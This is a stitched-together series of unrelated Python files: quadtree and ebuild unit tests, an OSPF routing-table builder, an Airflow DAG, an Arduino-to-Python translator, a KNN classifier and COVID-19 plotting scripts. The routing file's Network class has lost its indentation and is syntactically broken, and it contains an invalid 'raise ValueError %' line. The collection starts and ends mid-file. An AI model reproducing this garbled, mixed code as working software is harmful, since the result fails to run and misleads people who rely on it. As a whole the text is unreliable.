                self.assertTrue(itemRemoved is i)
        for i in itemsRemoved:
            self.assertFalse(q.containsItem(i, i.x, i.y))
            self.assertFalse(q.containsItem(i))
            # Removing a second time must fail gracefully.
            didRemove, itemRemoved = q.removeItem(i, i.x, i.y)
            self.assertFalse(didRemove)
            self.assertTrue(itemRemoved is None)
            self.assertFalse(self.quadContainsItem(q, i))

    def quadContainsItem(self, q, item):
        '''
        Forcibly looks at the quad and all its children quads to see if
        item is in it
        '''
        return self.getQuadContainingItem(q, item) is not None

    def getQuadContainingItem(self, q, item):
        """Return the first (sub)quad holding *item*, or None."""
        for child in (q.quadrant0, q.quadrant1, q.quadrant2, q.quadrant3):
            if child is not None and self.quadContainsItem(child, item):
                return child
        if q.itemsAndAssociatedQuads is None:
            return None
        if item in q.itemsAndAssociatedQuads:
            return q
        return None

    def testGetAllItemsWithinWidthLength(self):
        q = getBaseSpatialTree()
        areaX = 450
        areaY = 600
        areaWidth = 100
        areaLength = 100
        itemsNotToBeIncluded = []
        itemsToBeIncluded = []

        def getNonAreaX():
            if randint(0, 1):
                return randint(0, 449)  # X before the query area
            return randint(551, q.width)  # X past the query area

        def getNonAreaY():
            if randint(0, 1):
                return randint(0, 599)  # Y before the query area
            return randint(700, q.length)  # Y past the query area

        def getAreaX():
            return randint(areaX, areaX + areaWidth)

        def getAreaY():
            return randint(areaY, areaY + areaLength)

        for i in range(100):
            itemsNotToBeIncluded.append(TestItem(getNonAreaX(), getNonAreaY()))
        for i in range(100):
            itemsToBeIncluded.append(TestItem(getAreaX(), getAreaY()))
        for i in itemsToBeIncluded:
            q.add(i)
        for i in itemsNotToBeIncluded:
            q.add(i)
        itemsWithinWidthLength = q.getAllItemsWithinWidthLength(areaX, areaY, areaWidth, areaLength)
        for i in itemsToBeIncluded:
            if i not in itemsWithinWidthLength:
                # Diagnostic output for the failure that is about to be asserted.
                print("Should: " + "x: " + str(i.x) + " y: " + str(i.y))
                self.assertTrue(self.quadContainsItem(q, i))
            self.assertTrue(i in itemsWithinWidthLength)
        for i in itemsNotToBeIncluded:
            self.assertTrue(self.quadContainsItem(q, i))
            self.assertFalse(i in itemsWithinWidthLength)

    def testContainsItem(self):
        q, itemsAdded = self.testAdd()
        itemsNotAdded = [TestItem(randint(0, q.width), randint(0, q.length)) for i in range(100)]
        for i in itemsAdded:
            self.assertTrue(q.containsItem(i))
        for i in itemsNotAdded:
            self.assertFalse(q.containsItem(i))

    def testInitChildQuads(self):
        q = getBaseSpatialTree()
        q.itemsAndAssociatedQuads = {TestItem(10, 10): q,
                                     TestItem(100, 100): q}
        q.initChildQuads(clearParentItemsWhenDone=True)
        self.assertTrue(len(q.itemsAndAssociatedQuads) == 0)
        # Each child is half the parent's size.
        halfW = q.width / 2
        halfL = q.length / 2
        # q0: same origin as the parent.
        q0 = q.quadrant0
        self.assertTrue(q0 is not None)
        self.assertTrue(q0.originX == q.originX)
        self.assertTrue(q0.originY == q.originY)
        self.assertTrue(q0.width == halfW)
        self.assertTrue(q0.length == halfL)
        # q1: shifted right by half the width.
        q1 = q.quadrant1
        self.assertTrue(q1 is not None)
        self.assertTrue(q1.originX == q.originX + halfW)
        self.assertTrue(q1.originY == q.originY)
        self.assertTrue(q1.width == halfW)
        self.assertTrue(q1.length == halfL)
        # q2: shifted right and down.
        q2 = q.quadrant2
        self.assertTrue(q2 is not None)
        self.assertTrue(q2.originX == q.originX + halfW)
        self.assertTrue(q2.originY == q.originY + halfL)
        self.assertTrue(q2.width == halfW)
        self.assertTrue(q2.length == halfL)
        # q3: shifted down only.
        q3 = q.quadrant3
        self.assertTrue(q3 is not None)
        self.assertTrue(q3.originX == q.originX)
        self.assertTrue(q3.originY == q.originY + halfL)
        self.assertTrue(q3.width == halfW)
        self.assertTrue(q3.length == halfL)

    def testUpdateQuadToUpdatedItem(self):
        q, itemsAdded = self.testAdd(100)
        for i in range(5000):
            t = itemsAdded[randint(0, len(itemsAdded) - 1)]
            oldX, oldY = t.x, t.y
            t.x = randint(0, q.width)
            t.y = randint(0, q.length)
            q.updateQuadToUpdatedItem(t, t.x, t.y, oldX, oldY)
            self.assertTrue(q.containsItem(t))
            # The quad now holding the item must cover its new position.
            qTemp = self.getQuadContainingItem(q, t)
            self.assertTrue(qTemp.isWithinQuadRange(t.x, t.y))

    def testAreChildrenBorn(self):
        q = getBaseSpatialTree()
        q.quadrant0 = getBaseSpatialTree()
        self.assertTrue(q.areChildrenBorn())
        q.quadrant0 = q.quadrant1 = q.quadrant2 = q.quadrant3 = getBaseSpatialTree()
        self.assertTrue(q.areChildrenBorn())

    def testGetChildrenQuadAsList(self):
        q = getQuadTreeWithItems()
        for i in range(1000):
            q.add(TestItem(randint(0, i), randint(0, i)))
        q0, q1, q2, q3 = q.getChildrenQuadAsTuple()
        for child in (q0, q1, q2, q3):
            self.assertTrue(child is not None)
            self.assertTrue(type(child) is SpatialQuadTree2D)
print("Starting tests")
def getBaseSpatialTree(x=None, y=None, w=None, l=None, s=None, c=None):
    """Build a 1000x1000, capacity-25 SpatialQuadTree2D at the origin,
    substituting that default for any argument left as None."""
    x = 0 if x is None else x
    y = 0 if y is None else y
    w = 1000 if w is None else w
    l = 1000 if l is None else l
    s = {} if s is None else s
    c = 25 if c is None else c
    return SpatialBasedQuadTree.SpatialQuadTree2D(
        originX=x, originY=y, length=l, width=w, storedItems=s,
        quadrantCapacity=c)
def getChildrenOfBaseSpatialTree():
    """Return four child quads (q0..q3) of a fresh base tree.

    Each child is half the parent's width and length, positioned:
    q0 at the parent origin, q1 shifted right, q2 shifted right and down,
    q3 shifted down only. Each gets its own empty item store.
    """
    baseTree = getBaseSpatialTree()
    l = baseTree.length / 2
    w = baseTree.width / 2
    c = baseTree.quadrantCapacity

    # Helper collapsing the four copy-pasted constructions of the original.
    def child(x, y):
        return SpatialBasedQuadTree.SpatialQuadTree2D(
            originX=x, originY=y, length=l, width=w, storedItems={},
            quadrantCapacity=c)

    q0 = child(baseTree.originX, baseTree.originY)
    q1 = child(baseTree.originX + w, baseTree.originY)
    q2 = child(baseTree.originX + w, baseTree.originY + l)
    q3 = child(baseTree.originX, baseTree.originY + l)
    return q0, q1, q2, q3
def getQuadTreeWithItems():
    """Build a base-sized tree whose item store is pre-seeded with one item.

    NOTE(review): the seed store is a list here while getBaseSpatialTree
    uses a dict -- kept as in the original; confirm which the tree expects.
    """
    seeded = [TestItem(10, 10)]
    return SpatialBasedQuadTree.SpatialQuadTree2D(
        originX=0, originY=0, length=1000, width=1000,
        storedItems=seeded, quadrantCapacity=25)
# Run the test suite only when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
"""Ebuild Tests."""
import copy
import logging
import os
import unittest
import unittest.mock
from typing import Any, Callable, Dict, Tuple
from etest.ebuild import Ebuild
from etest_test.fixtures_test import FIXTURES_DIRECTORY
from etest_test.fixtures_test.ebuilds_test import EBUILDS
logger = logging.getLogger(__name__)
class BaseEbuildMetaTest(type):
    """Base Ebuild Metatest.

    Metaclass that, at class-creation time, stamps generated test methods onto
    the class being built: one constructor test per ebuild fixture plus one
    test per property in the fixed property tuple below.
    """

    def __init__(cls, name: str, bases: Tuple[type, ...], dct: Dict[str, Any]) -> None:
        """Construct a base Ebuild meta test."""
        super(BaseEbuildMetaTest, cls).__init__(name, bases, dct)

        def gen_constructor_case(
            ebuild: Dict[str, Any]
        ) -> Callable[["EbuildUnitTest"], None]:
            # Build a test asserting Ebuild() stores path and overlay verbatim.
            def case(self: "EbuildUnitTest") -> None:
                result = Ebuild(
                    path=ebuild["path"],
                    overlay=self.mocked_overlay,
                )
                self.assertEqual(result.path, ebuild["path"])
                self.assertEqual(result.overlay, self.mocked_overlay)
            # Unique per-fixture name so unittest discovers each one separately.
            case.__name__ = "test_constructor_" + str(ebuild["uuid"])
            case.__doc__ = (
                f"ebuild.Ebuild(path = '{ebuild['path']}', overlay = mocked_overlay)"
            )
            return case

        def gen_property_case(
            ebuild: Dict[str, Any], prop: str
        ) -> Callable[["EbuildUnitTest"], None]:
            # Build a test asserting one Ebuild property matches the fixture,
            # with parse() mocked to return the fixture's symbols.
            def case(self: "EbuildUnitTest") -> None:
                result = Ebuild(
                    path=ebuild["path"],
                    overlay=self.mocked_overlay,
                )
                result.parse = unittest.mock.MagicMock(return_value=ebuild["symbols"])
                self.assertEqual(getattr(result, prop), ebuild[prop])
            case.__name__ = "test_property_" + prop + "_" + str(ebuild["uuid"])
            case.__doc__ = f"ebuild.Ebuild(path = '{ebuild['path']}', overlay = mocked_overlay).{prop} == '{ebuild[prop]}'"  # noqa: E501 # pylint: disable=C0301
            return case

        # deepcopy so the generated closures cannot mutate the shared fixtures.
        for ebuild in copy.deepcopy(EBUILDS["all"]):
            _ = gen_constructor_case(ebuild)
            logger.info("adding %s", _.__name__)
            setattr(cls, _.__name__, _)
            for prop in (
                "compat",
                "cpv",
                "name",
                "use_flags",
                "version",
                "restrictions",
            ):
                _ = gen_property_case(ebuild, prop)
                logger.info("adding %s", _.__name__)
                setattr(cls, _.__name__, _)
class EbuildUnitTest(unittest.TestCase, metaclass=BaseEbuildMetaTest):
    """Ebuild Unit Test.

    Concrete test case; its test_* methods are generated by the metaclass.
    """

    def setUp(self) -> None:
        """Set up test cases."""
        super().setUp()
        # Overlay stub whose .directory property points at the fixture overlay tree.
        self.mocked_overlay = unittest.mock.MagicMock()
        type(self.mocked_overlay).directory = unittest.mock.PropertyMock(
            return_value=os.path.join(FIXTURES_DIRECTORY, "overlay"),
        )
|
__author__ = 'alonabas'
from priority_dict import *
from RoutingTable import *
class RouterInterface:
    """One interface of a router: its IP, mask, MAC and derived network address."""

    def __init__(self, ip, mask, mac):
        # AND each dotted-quad octet of ip and mask to derive the network address.
        octet_pairs = zip(str(ip).split('.'), str(mask).split('.'))
        network_octets = [int(a) & int(b) for a, b in octet_pairs]
        self.network = IPAddr('.'.join(str(o) for o in network_octets))
        self.ip = IPAddr(ip)
        self.mask = IPAddr(mask)
        self.mac = mac

    def match(self, ip_address):
        """Return True when *ip_address* falls inside this interface's network."""
        return ip_address.inNetwork(self.network, self.mask)

    def __str__(self):
        return 'Network IP: %s, Network Mask: %s, IP address: %s, MAC adddress: %s' % (
            str(self.network), str(self.mask), str(self.ip), str(self.mac))
class EdgeData:
    """One weighted link between two router ports.

    Endpoints are stored as (router_id, port) tuples in self.router1 and
    self.router2; self.cost is the link weight.
    """

    def __init__(self, id1, port1, id2, port2, cost):
        self.router1 = (id1, port1)
        self.router2 = (id2, port2)
        self.cost = cost

    def __str__(self):
        left_id, left_port = self.router1
        right_id, right_port = self.router2
        return 'Router %d, Port %d <-> Router %d, Port %d, Cost: %d' % (
            left_id, left_port, right_id, right_port, self.cost)
class NodeData:
    """A router node: its id plus the interface attached to each port."""

    def __init__(self, router_id):
        self.id = router_id
        self.interfaces = {}  # port number -> RouterInterface

    def add_interface(self, port, router_interface):
        """Attach router_interface to the given port number."""
        self.interfaces[port] = router_interface

    def __str__(self):
        header = 'Router ID: %d\n' % self.id
        port_lines = ['Port: %d, Inteface: %s' % (port, str(iface))
                      for port, iface in self.interfaces.items()]
        return header + '\n'.join(port_lines)
class Network:
__metaclass__ = SingletonType
def __init__(self):
self.graph = Graph()
config_file = open(CONFIG_FILENAME)
# config_file = open('/Users/alonabas/Dropbox/theorysem/ex2/config')
lines = config_file.readlines()
self.networks = {}
status = 1
index_start = 0
while status == 1:
index_end = lines.index('\n', index_start)
data = [line for line in lines[index_start:index_end]]
if data[0].startswith('router'):
# is router
router_id = int((data[0].replace('router', '')).strip())
node_data = NodeData(router_id)
number_ports = int((data[1].replace('ports', '')).strip())
for i in range(number_ports):
# port
port = int((data[i*4+2].replace('port', '')).strip())
ip = (data[i*4+3].replace('ip', '')).strip()
mask = (data[i*4+4].replace('mask', '')).strip()
mac = (data[i*4+5].replace('mac', '')).strip()
router_interface = RouterInterface(ip, mask, mac)
node_data.add_interface(port, router_interface)
network = (router_interface.network, router_interface.mask)
if network not in self.networks:
self.networks[network] = []
self.networks[network].append(router_id)
self.graph.add_node(router_id, node_data)
elif data[0].__eq__('link\n'):
left = ((data[1].replace('left', '').strip()).split(','))
right = ((data[2].replace('right', '').strip()).split(','))
cost = int(data[3].replace('cost', '').strip())
left_id = int(left[0].strip())
left_port = int(left[1].strip())
right_id = int(right[0].strip())
right_port = int(right[1].strip())
edge_data = EdgeData(left_id, left_port, right_id, right_port, cost)
self.graph.add_edge(left_id, right_id, edge_data)
else:
status = 0
index_start = index_end + 1
def compute_dijkstra(self, src_router):
dist = {}
previous = {}
result = {}
queue = priority_dict()
queue[src_router] = 0
#according to http://en.wikipedia.org/wiki/Dijkstra%27s_algorithm
while queue:
v = queue.smallest()
dist[v] = queue[v]
queue.pop_smallest()
if v is None:
break
neighbours = [w for w in self.graph.nodes if self.graph.get_edge(w, v) is not None]
for w in neighbours:
temp_dist = dist[v] + self.graph.get_edge(w, v).cost
if w in dist:
if temp_dist < dist[w]:
raise ValueError % "Dijkstra: found better path to already-final vertex"
elif w not in queue or temp_dist < queue[w]:
queue[w] = temp_dist
previous[w] = v
queue.update()
for router in dist:
if router != src_router:
neighbour = router
while previous[neighbour] != src_router:
neighbour = previous[neighbour]
result[router] = neighbour
return result
def compute_ospf(self):
routes = {}
for router in self.graph.nodes:
routes[router] = self.compute_dijkstra(router)
return routes
def get_routing_table(self, router):
table = RoutingTable()
#subnets of current router
this_router = self.graph.nodes[router]
for port in this_router.interfaces:
destination = (port, this_router.interfaces[port].mac, None)
table.add(this_router.interfaces[port].network, this_router.interfaces[port].mask, destination)
#subnets in other router
routes = self.compute_ospf()
for network in self.networks:
#find routers of that subnet
for cur_router_id in self.networks[network]:
if cur_router_id != router:
next_hop_router_id = routes[router][cur_router_id]
edge_data = self.graph.get_edge(router, next_hop_router_id)
(router1_id, port1_id) = edge_data.router1
(router2_id, port2_id) = edge_data.router2
if router1_id == router:
output_port = port1_id
input_port = port2_id
else:
output_port = port2_id
input_port = port1_id
output_port_mac = self.graph.nodes[router].interfaces[output_port].mac
next_hop_ip = self.graph.nodes[next_hop_router_id].interfaces[input_port].ip
destination = (output_port, output_port_mac, next_hop_ip)
table.add(network[0], network[1], destination)
return table
def print_graph(self):
for edge in self.graph.edges:
data = list(edge)
print str(self.graph.nodes[data[0]])
print str(self.graph.nodes[data[1]])
print str(self.graph.get_edge(data[0], data[1]))
# Demo: build the network from the config file and look up one destination.
a = Network()
b = a.get_routing_table(101)  # routing table for router id 101
b.lookup('10.0.0.1')
|
# -*- coding: utf-8 -*-
import time
import random
from pathlib import Path
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.utils.dates import days_ago
HOME = Path.home()
LOG_FILE = Path(HOME, "airflow", "sanhe-test-log.txt")
def step1_callable():
    """First task: log a message, then simulate 3 seconds of work."""
    message = "sleep for 3 sec"
    print(message)
    time.sleep(3)
def step2_callable():
    """Second task: log a message, then simulate 6 seconds of work."""
    message = "sleep for 6 sec"
    print(message)
    time.sleep(6)
# Default task arguments; the unused knobs are kept commented out as a
# reference (standard Airflow boilerplate).
default_args = {
    'owner': 'airflow',
    'depends_on_past': False,
    'email': ['airflow@example.com'],
    'email_on_failure': False,
    'email_on_retry': False,
    'retries': 1,  # retry each failed task once
    'retry_delay': timedelta(minutes=1),
    # 'queue': 'bash_queue',
    # 'pool': 'backfill',
    # 'priority_weight': 10,
    # 'end_date': datetime(2016, 1, 1),
    # 'wait_for_downstream': False,
    # 'dag': dag,
    # 'sla': timedelta(hours=2),
    # 'execution_timeout': timedelta(seconds=300),
    # 'on_failure_callback': some_function,
    # 'on_success_callback': some_other_function,
    # 'on_retry_callback': another_function,
    # 'sla_miss_callback': yet_another_function,
    # 'trigger_rule': 'all_success'
}
# NOTE(review): default_args is defined but never passed to the DAG below --
# confirm whether DAG(..., default_args=default_args) was intended.
# Two-task DAG: step1 -> step2, scheduled every 60 seconds.
# catchup=False skips backfilling the intervals since start_date.
with DAG(
    "two_steps",
    description='simple two step DAG',
    start_date=days_ago(2),
    schedule_interval=timedelta(seconds=60),
    catchup=False,
) as dag:
    step1 = PythonOperator(task_id="step1", python_callable=step1_callable)
    step2 = PythonOperator(task_id="step2", python_callable=step2_callable)
    step1 >> step2  # step2 runs only after step1 succeeds
|
# Ad-hoc Arduino-C -> Python translator.  Reads an Arduino sketch from
# compiler/test.txt and writes the translated Python to Arduino/script.py.
f = open("Arduino/script.py", "w")
print("James amazing compiler")
print("report any bugs plz")
print("Ver 1.1")
print("current support: Arduino ('pins') and LCD")
indent = 0   # indentation level applied to the CURRENT output line
indentA = 0  # indentation level for the NEXT line (updated by { and })
i = 0
lcdneed = False  # set once an LCD pin declaration (rs/en/d4..d7) is seen
#pin.disable([rs, en, d4, d5, d6, d7])
# Boilerplate prelude written to the top of every generated script.
array = ['from time import sleep\nfrom functions import *\nLED_BUILTIN = 13\nOUTPUT = "OUTPUT"\nINPUT = "INPUT"\nHIGH = True\nLOW = False\nrender = 0\npin = 0\nSerial = 0\nlcd =0\ndef init(renderA, pinA, SerialA, lcdA, starttime):\n global render\n global pin\n global Serial\n global lcd\n lcd = lcdA\n Serial = SerialA\n render = renderA\n pin = pinA\n initsc(render, pin, starttime)\nA0, A1, A2, A3, A4, A5 = "A0","A1","A2","A3","A4","A5"\n\n']
for i in array:
    f.write(i)
# Translate the sketch line by line: track brace depth for indentation,
# rewrite C constructs into their Python equivalents, and emit the result.
with open("compiler/test.txt") as file_in:
    lines = []
    for line in file_in:
        #print("in")
        #print(line)
        # Apply the previous line's depth; braces on THIS line only affect
        # the indentation of following lines.
        indent = indentA
        if("{"in line):
            indentA = indentA + 1
        elif("}"in line):
            indentA = indentA - 1
        elif("LiquidCrystal" in line):
            line = ""
        elif("#include <LiquidCrystal.h>" in line):
            line = ""
        elif("rs =" in line and "en =" in line and "d4 =" in line):
            # LCD pin declaration: collapse the six assignments into one
            # tuple assignment and remember that LCD setup is needed.
            no = line.replace('rs =', '')
            no = no.replace('en =', '')
            no = no.replace('d4 =', '')
            no = no.replace('d5 =', '')
            no = no.replace('d6 =', '')
            no = no.replace('d7 =', '')
            #print(no)
            text = "rs, en, d4, d5, d6, d7 ="
            line = text + no
            lcdneed = True
        i = 0
        if("} else {" in line):
            line = "else:"
            indent = indent - 1
            indentA = indentA - 1
        lock = 0
        out = ""
        if("void setup()" in line):
            if(lcdneed):
                print("LCD detected and implmented")
                text = " pin.disable([rs, en, d4, d5, d6, d7]) \n"
                line = line + text
        if("int" in line and ")" in line and "{" in line and "(" in line):
            # int-returning function definition: turn into `def` and strip
            # leading whitespace (lock flips once the first non-space is seen).
            line = line.replace("int ", "def ")
            while i != len(line):
                if(lock == 1):
                    out = out + line[i]
                elif(line[i] == " "):
                    out = out + ''
                else:
                    lock = 1
                    out = out + line[i]
                i = i + 1
            #print(out)
            line = out
        # Token-level rewrites from C syntax to Python.
        line = line.replace("//", "#")
        line = line.replace("/*", '"""')
        line = line.replace("*/", '"""')
        line = line.replace(";", "")
        line = line.replace("int ", "")
        line = line.replace("const ", "")
        line = line.replace("delay(", "sleep(")
        line = line.replace("{", ":")
        line = line.replace("}", "")
        line = line.replace("loop()", "script()")
        line = line.replace("void", "def ")
        if("sleep(" in line):
            # Convert delay's milliseconds to sleep's seconds, preserving any
            # trailing '#' comment on the same line.
            time = line.replace(')', '')
            time = time[6:]
            outtime = 0
            text = ""
            read = 0
            #print(time)
            for char in time:
                # NOTE(review): "12234567890" duplicates '2' -- harmless,
                # but presumably meant "1234567890".
                if(char in "12234567890"):
                    outtime = (outtime * 10) + int(char)
                elif(char == "#"):
                    text = text + char
                    read = 1
                elif(read == 1):
                    text = text + char
            time = float(outtime / 1000)
            #print(time)
            if(text == ""):
                text = "\n"
            line = "sleep("+str(time)+") "+text
        i = 0
        #print(indent)
        # Re-indent the translated line to the tracked depth.
        if(indent > 0):
            while i != indent:
                #print(i)
                line = " "+line
                i = i + 1
        #print("out")
        #print(line)
        #print("")
        lines.append(line)
        f.write(line)
#print(lines)
f.close()
print("Done! to use run start.sh")
#print(lines)
|
from typing import Union
from goerr.colors import colors
class Msg:
    """
    Class to handle the messages

    Each method returns a bracketed, colorized level tag (e.g. "[error]"),
    optionally prefixed with a numeric index.  The repeated
    bracket-and-prefix logic is centralized in the private _head helper.
    """

    def _head(self, label: str, i: Union[int, None]) -> str:
        """Wrap the colorized label in brackets, prefixing the optional index."""
        head = "[" + label + "]"
        if i is not None:
            head = str(i) + " " + head
        return head

    def fatal(self, i: Union[int, None] = None) -> str:
        """
        Returns a fatal error message
        """
        return self._head(colors.red("\033[1mfatal error"), i)

    def error(self, i: Union[int, None] = None) -> str:
        """
        Returns an error message
        """
        return self._head(colors.red("error"), i)

    def warning(self, i: Union[int, None] = None) -> str:
        """
        Returns a warning message
        """
        return self._head(colors.purple("\033[1mwarning"), i)

    def info(self, i: Union[int, None] = None) -> str:
        """
        Returns an info message
        """
        return self._head(colors.blue("info"), i)

    def via(self, i: Union[int, None] = None) -> str:
        """
        Returns an via message
        """
        return self._head(colors.green("via"), i)

    def debug(self, i: Union[int, None] = None) -> str:
        """
        Returns a debug message
        """
        return self._head(colors.yellow("debug"), i)
|
import numpy as np
from math import sqrt
from collections import Counter
from Utils.AccuracyFunction import accuracy_score
class KNNClassfier:
    """k-nearest-neighbours classifier with a scikit-learn style fit/predict API."""

    def __init__(self, k):
        """Store the neighbour count; training data is attached later by fit()."""
        assert 1 <= k , "K must be >= 1!"
        self.k = k
        # Leading underscore marks the memorised training set as private.
        self._X_train = None
        self._y_train = None

    def fit(self, X_train, y_train):
        """Memorise the training set (KNN needs no actual training step)."""
        assert X_train.shape[0] == y_train.shape[0], "The size of X_train must be the same as y_train!"
        assert self.k <= X_train.shape[0], "K must be <= the size of X_train!"
        self._X_train = X_train
        self._y_train = y_train
        # Returning self follows the scikit-learn convention.
        return self

    def predict(self, X_predict):
        """Predict a label for every row of X_predict; returns an ndarray."""
        assert self._X_train is not None and self._y_train is not None, "must be fit before predict!"
        assert self._X_train.shape[1] == X_predict.shape[1], "The features of X_train must be the same as predictx"
        return np.array([self._predict(sample) for sample in X_predict])

    def _predict(self, x):
        """Label one sample by majority vote among its k nearest neighbours."""
        assert x.shape[0] == self._X_train.shape[1], "The features of X_train must be the same as predict x !"
        dists = [sqrt(np.sum((row - x) ** 2)) for row in self._X_train]
        nearest_order = np.argsort(dists)
        top_labels = self._y_train[nearest_order[:self.k]]
        return Counter(top_labels).most_common(1)[0][0]

    def score(self, X_test, y_test):
        """Mean accuracy of predict(X_test) against y_test."""
        return accuracy_score(y_test, self.predict(X_test))

    def __repr__(self):
        return "KNN(k = %d)" % self.k
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 7 01:43:15 2020
@author: Aalaap Nair & Shanmugha Balan
"""
import csv
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
import imageio as io
# Get the lines from the file to a processed list
def process_file(file_dest):
    """Read a CSV file and return its rows as lists, without the header row.

    Args:
        file_dest: path of the CSV file to read.

    Returns:
        list of rows (each a list of strings); [] for an empty file.
    """
    with open(file_dest, "r") as f:
        rows = list(csv.reader(f, delimiter=","))
    # Slicing (rather than `del rows[0]`) is safe on an empty file,
    # which previously raised IndexError.
    return rows[1:]
# A specific DataFrame maker for the covid_19_india.csv
def make_ind_df(contents, summary=False):
    """Aggregate the per-state rows of covid_19_india.csv into one total per date.

    Rows with the same date (column 1) are summed; the last three columns are
    recovered, deceased and infected counts.  Returns a DataFrame with columns
    'Days since first infection', 'Infected', 'Dead', 'Recovered'.
    If summary is True, prints df.info().
    """
    infected, deceased, recovered, dates = [], [], [], []
    current_date = contents[0][1]  # start date
    inf_total = dead_total = rec_total = 0
    day_index = 0
    # The data is made cumulative per date in this loop.
    for row in contents:
        if row[1] == current_date:
            # Same date: accumulate this row's counts into the running totals.
            inf_total += int(row[-1])
            dead_total += int(row[-2])
            rec_total += int(row[-3])
        else:
            # New date: flush the finished day's totals, then start a new day.
            dates.append(day_index)
            day_index += 1
            current_date = row[1]
            infected.append(inf_total)
            deceased.append(dead_total)
            recovered.append(rec_total)
            inf_total = int(row[-1])
            dead_total = int(row[-2])
            rec_total = int(row[-3])
    # Flush the final day.
    infected.append(inf_total)
    deceased.append(dead_total)
    recovered.append(rec_total)
    dates.append(day_index)
    df = pd.DataFrame({
        'Days since first infection': dates,
        'Infected': infected,
        'Dead': deceased,
        'Recovered': recovered,
    })
    if summary:
        df.info()
    return df
# A specific DataFrame maker for the covid19_italy_region.csv
def make_ita_df(contents, summary=False):
    """Aggregate the per-region rows of covid19_italy_region.csv into one
    total per date.

    Rows with the same date (column 1) are summed; columns [-2], [-3], [-4]
    hold infected, deceased and recovered counts.  Returns a DataFrame with
    columns 'Days since first infection', 'Infected', 'Dead', 'Recovered'.
    If summary is True, prints df.info().
    """
    infected, deceased, recovered, dates = [], [], [], []
    current_date = contents[0][1]  # start date
    inf_total = dead_total = rec_total = 0
    day_index = 0
    # The data is made cumulative per date in this loop.
    for row in contents:
        if row[1] == current_date:
            # Same date: accumulate this row's counts into the running totals.
            inf_total += int(row[-2])
            dead_total += int(row[-3])
            rec_total += int(row[-4])
        else:
            # New date: flush the finished day's totals, then start a new day.
            dates.append(day_index)
            day_index += 1
            current_date = row[1]
            infected.append(inf_total)
            deceased.append(dead_total)
            recovered.append(rec_total)
            inf_total = int(row[-2])
            dead_total = int(row[-3])
            rec_total = int(row[-4])
    # Flush the final day.
    infected.append(inf_total)
    deceased.append(dead_total)
    recovered.append(rec_total)
    dates.append(day_index)
    df = pd.DataFrame({
        'Days since first infection': dates,
        'Infected': infected,
        'Dead': deceased,
        'Recovered': recovered,
    })
    if summary:
        df.info()
    return df
# A specific DataFrame maker for the us_covid19_daily.csv
def make_usa_df(contents, summary=False):
    """Build a DataFrame from us_covid19_daily.csv rows (newest first).

    Column 2 is infected, 11 is recovered, 14 is deceased; blank cells are
    coerced to 0.  Rows arrive newest-first, so each value is inserted at the
    front to yield chronological order.  If summary is True, prints df.info().
    """
    infected, deceased, recovered, dates = [], [], [], []
    day_index = len(contents)
    for row in contents:
        dates.insert(0, day_index)
        day_index -= 1
        infected.insert(0, int(row[2]))
        # Blank counts are normalized to 0 (mutating the row, as before).
        if row[14] == '':
            row[14] = 0
        if row[11] == '':
            row[11] = 0
        deceased.insert(0, int(row[14]))
        recovered.insert(0, int(row[11]))
    df = pd.DataFrame({
        'Days since first infection': dates,
        'Infected': infected,
        'Dead': deceased,
        'Recovered': recovered,
    })
    if summary:
        df.info()
    return df
# A specific DataFrame maker for the covid19_korea.csv
def make_kor_df(contents, summary=False):
    """Build a DataFrame from covid19_korea.csv rows (one row per day).

    Columns [-3], [-2], [-1] hold infected, recovered and deceased counts.
    If summary is True, prints df.info().
    """
    infected, deceased, recovered, dates = [], [], [], []
    for day_index, row in enumerate(contents):
        dates.append(day_index)
        infected.append(int(row[-3]))
        deceased.append(int(row[-1]))
        recovered.append(int(row[-2]))
    df = pd.DataFrame({
        'Days since first infection': dates,
        'Infected': infected,
        'Dead': deceased,
        'Recovered': recovered,
    })
    if summary:
        df.info()
    return df
# A simple despined line plot
def singlelineplot(prop, df, color, label):
    """Draw one despined line of df[prop] vs. days on the current axes."""
    sns.lineplot(x='Days since first infection', y=prop, data=df, color=color, label=label)
    sns.despine()
# A comparative line plot between two countries
def compareproperties(prop, df1, df1_name, df2, df2_name):
    """Plot `prop` for two countries on one figure and show it.

    df1/df2 are the country DataFrames; df1_name/df2_name become the legend labels.
    """
    plt.figure()
    sns.set(style='darkgrid')
    singlelineplot(prop, df1, "#00ff00", label=df1_name)
    singlelineplot(prop, df2, "#009900", label=df2_name)
    plt.title(prop)
    plt.show()
# A graph of the infected, dead and recovered in a country
def countrysituation(df, country):
    """Plot Infected, Dead and Recovered curves for one country and show it."""
    plt.figure()
    sns.set(style='dark')
    singlelineplot("Infected", df, "#da4272", "Infected")
    singlelineplot("Dead", df, "#000000", "Dead")
    singlelineplot("Recovered", df, "#10d260", "Recovered")
    plt.title(country)
    plt.show()
# Generates a plot with every progressing day
# Primarily, a feeder function for gifize()
def animate(df, prop, country):
    """Save one cumulative line-plot frame per day and return the filenames.

    Frame i plots the first i rows of df.  PNGs are written into a directory
    named after `prop` (assumed to already exist -- TODO confirm).
    Feeder function for gifize().
    """
    pics = []
    rows = df.size/4  # row count: the DataFrame has exactly 4 columns
    y_limit = max(df[prop])
    title = str(prop + " in " + country)
    for i in range(1, int(rows)):
        plt.figure(figsize=(10,6))
        plt.title(title, fontsize=20)
        # Fixed axes so every frame shares the same scale.
        plt.xlim(0, rows)
        plt.ylim(0, y_limit)
        plt.xlabel('Days since first infection', fontsize=15)
        plt.ylabel(prop, fontsize=15)
        data = df.iloc[:i]
        sns.lineplot(x="Days since first infection", y=data[prop], data=data)
        filename = str(str(prop) + "/" + str(i) + ".png")
        plt.savefig(filename)
        pics.append(filename)
    return pics
# Converts the pictures to a gif
def gifize(pics):
    """Combine the image files listed in `pics` into covid.gif."""
    images = []
    for img in pics:
        images.append(io.imread(img))
    io.mimsave("covid.gif", images)
# Invoking the functions to build the DataFrames
# Invoking the functions to build the DataFrames
ind_df = make_ind_df(process_file("covid_19_india.csv"))
ita_df = make_ita_df(process_file("covid19_italy_region.csv"))
usa_df = make_usa_df(process_file("us_covid19_daily.csv"))
kor_df = make_kor_df(process_file("covid19_korea.csv"))
# Comparing stats in two countries
compareproperties("Infected", ind_df, "India", kor_df, "Korea")
compareproperties("Dead", ita_df, "Italy", usa_df, "USA")
# Comparing the infected of all 4 countries
prop = 'Infected'
plt.figure()
sns.set(style='darkgrid')
singlelineplot(prop, ind_df, "#173367", label='India')
